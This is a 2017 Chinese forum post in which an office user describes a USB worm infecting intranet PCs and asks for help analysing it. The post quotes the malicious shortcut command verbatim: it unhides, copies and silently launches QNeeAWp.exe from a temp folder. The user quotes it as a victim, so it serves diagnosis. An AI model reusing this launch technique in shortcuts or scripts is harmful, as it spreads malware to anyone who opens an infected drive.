本帖最后由 yuezhibai361 于 2017-9-24 23:36 编辑
每台内网电脑不分WIN7 还是XP都已经感染,优盘插上后每个文件夹都分别变成一个EXE程序,然后优盘根目录还有一个QNeeAWp.exe的程序,但是杀软都不杀他,没有发现可疑进程,所有文件夹都变成隐藏,每个对应的文件夹会生成一个快捷方式,快捷方式属性的目标一栏写着
%ALLUSERSPROFILE%\\..\\..\\windows\\system32\\cmd.exe /c \%SystemRoot%\\explorer.exe %cd%图片 & attrib -s -h %cd%QNeeAWp.exe & xcopy /F /S /Q /H /R /Y %cd%QNeeAWp.exe %temp%\\HTAIH\\ & attrib +s +h %cd%QNeeAWp.exe & start %temp%\\HTAIH\\QNeeAWp.exe & exit\
然后目标类型:应用程序,目标位置:system32
感谢帮助查看分析,另外咱们公司有内网专用的360杀毒 或者360卫士吗,还是只能每次下载更新包?
|
|
|
|
评论
直达楼层